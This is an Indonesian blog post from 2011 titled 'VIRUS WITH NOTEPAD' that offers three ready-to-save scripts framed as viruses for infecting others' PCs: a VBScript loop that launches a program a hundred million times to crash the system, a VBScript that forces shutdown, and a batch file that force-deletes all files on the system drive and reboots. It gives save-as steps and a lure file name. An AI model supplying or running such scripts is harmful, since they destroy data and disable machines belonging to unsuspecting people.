Sabtu, 07 Mei 2011
VIRUS WITH NOTEPAD
Cara gampang bikin virus yaitu dengan notepad....
1. Virus berEfek Errorkan PC yang terinveksi
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
copas code diatas ke notepad lalu simpan dengan nama VBS.bat jangan lupa pastikan ”save as type” diubah ke ”all files” download code
2. Efek shuttdown otomatis PC yang terinfeksi
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 1
wshshell.run "shutdown -s -c dunia-atas.blogspot.com"
next
copas code diatas ke notepad lalu simpan dengan nama dont klick.vbs jangan lupa pastikan ”save as type” diubah ke ”all files” download code
3. Efek Format otomatis Hardisk C PC yang terinfeksi
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
copas code diatas ke notepad lalu simpan dengan nama dont dunia.bat jangan lupa pastikan ”save as type” diubah ke ”all files” download code
Komentarnya ya....
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar